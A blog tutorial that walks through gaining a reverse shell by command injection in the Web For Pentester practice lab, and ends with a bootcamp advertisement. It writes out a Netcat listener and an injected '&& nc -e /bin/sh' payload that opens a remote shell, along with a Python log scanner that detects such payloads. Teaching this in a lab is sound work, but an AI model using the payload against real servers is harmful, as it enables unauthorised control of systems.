26 July, 2024

Reverse shell via command injection

Do you know how to execute a reverse shell via command injection in a web hacking practice environment?

The following tutorial on how to run a reverse shell via command injection is made for educational purposes. The purpose of the technique that we will see below is to understand how an attacker acts when exploiting a critical vulnerability in a website.

Code injection is the third most used web cyberattack, according to the OWASP Top 10 list. Command injection is a type of attack that allows Linux bash commands to be executed and, in this way, extract information or take control of the application server.

In this post, we will see how to execute a reverse shell via command injection in a web hacking practice environment called Web For Pentester. But first, we will review some concepts necessary to perform this exercise.

Reverse shell via command injection

Before delving into the tutorial on how to run a reverse shell via command injection, we will review the concepts of direct shell and reverse shell, how they differ and which one we should choose when performing a penetration test.

A direct shell is a command terminal that connects from the attacker's machine to the victim. A reverse shell, on the other hand, causes the compromised computer to connect to the hacker's computer.

Reverse shells are preferable when carrying out cyber attacks, since they allow us to avoid firewalls and other protective measures. Therefore, in this exercise, we will execute a reverse shell with the Netcat program.

Preparation

Create or open a virtual machine with the latest version of Kali Linux.
Create or open a virtual machine from the Web For Pentester ISO image, by PentesterLab.
Find out the IP address of your machine with Web For Pentester by running the "ifconfig" command in its terminal.

Now, open your virtual machine with Kali and start the Burp Suite program, which comes preinstalled in the operating system. There, go to the Proxy tab and click on "Open browser". In the Burp Suite browser, access the IP address of the Web For Pentester virtual machine. You will see the following page:

Attack

To carry out the reverse shell attack via command injection, open the link that says "Example 1" in the "Command injection" section. The link will take you to the following page:

Now, open the Burp Suite window and activate "Intercept is on". Once you've done this, open a Kali terminal and listen on a port with the command:

nc -lvp 4444

After listening on port 4444, return to the browser window and modify the page URL. To concatenate Linux commands, we will use " && ", with spaces, at the end of the URL, followed by the code to execute.

To run our payload and create a reverse shell that connects from the page server to our Kali virtual machine, we will run the following command at the end of the original URL of the site:

nc -e /bin/sh

That is, the payload from our example would look like this:

&& nc -e /bin/sh 192.168.175.128 4444

When you have configured your payload, press Enter and go to the Burp Suite window. Right-click on the intercepted request and select the "Send to Repeater" option. There, you will have to modify the request to be able to access the reverse shell via command injection. Go to the Repeater tab, right-click on the request and select the option "URL-encode as you type".

Now, rewrite the payload in the header of the request so that it looks like this:

You will notice that the spaces have been changed to "+" symbols and the "&" symbols have been changed to the value "%26". This means that the payload has been encoded correctly and can be executed. Therefore, press the "Send" button to send the request.
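From the defender's side, the encoded request described above is exactly what the web server writes to its access log. The following Python script is an added example, not part of the original tutorial: it decodes each query parameter and flags command-chaining operators and Netcat's -e option. The combined log format, the /example1.php path and the "ip" parameter name are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Operators that chain or substitute commands once a value reaches a shell.
SHELL_META = re.compile(r"&&|\|\||[;|`\n]|\$\(")
# Netcat invoked with -e (run a program on connect), as in the payload above.
NETCAT_EXEC = re.compile(r"\b(?:nc|ncat|netcat)\b[^;|&]*\s-\w*e\b")
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the path and the "ip" parameter are assumptions.
SAMPLE_LOG = [
    '192.168.175.128 - - [26/Jul/2024:10:00:01 +0000] '
    '"GET /example1.php?ip=127.0.0.1 HTTP/1.1" 200 512',
    '192.168.175.128 - - [26/Jul/2024:10:00:09 +0000] '
    '"GET /example1.php?ip=127.0.0.1+%26%26+nc+-e+/bin/sh+192.168.175.128+4444 HTTP/1.1" 200 0',
    '192.168.175.128 - - [26/Jul/2024:10:00:15 +0000] '
    '"GET /example1.php?ip=127.0.0.1+%26%26+id HTTP/1.1" 200 600',
]

def inspect_request(log_line):
    """Return (parameter, reason, decoded value) findings for one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    findings = []
    # parse_qsl splits on "&" first, then decodes %XX and "+", so an encoded
    # "%26%26" shows up inside the value exactly as the application receives it.
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        if NETCAT_EXEC.search(value):
            findings.append((name, "netcat -e", value))
        elif SHELL_META.search(value):
            findings.append((name, "shell metacharacter", value))
    return findings

def scan(lines):
    """Map line number (1-based) to findings, skipping clean requests."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        found = inspect_request(line)
        if found:
            hits[number] = found
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        for name, reason, value in found:
            print(f"line {number}: {reason} in parameter {name!r}: {value!r}")
```

A parameter that should only ever hold an IP address has no legitimate reason to contain "&&", so any hit on it is worth investigating.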

As proof that the reverse shell has been executed, you will see the following message in the Kali terminal running Netcat after submitting the request:

You will then be able to execute any command on the web application server, for example:

How to learn more?

We have already seen how to execute a reverse shell via command injection. If you want to learn more web hacking techniques, enter our Cybersecurity Full Stack Bootcamp and discover how to specialize in just 7 months. Ask for more information and discover how to change your life!
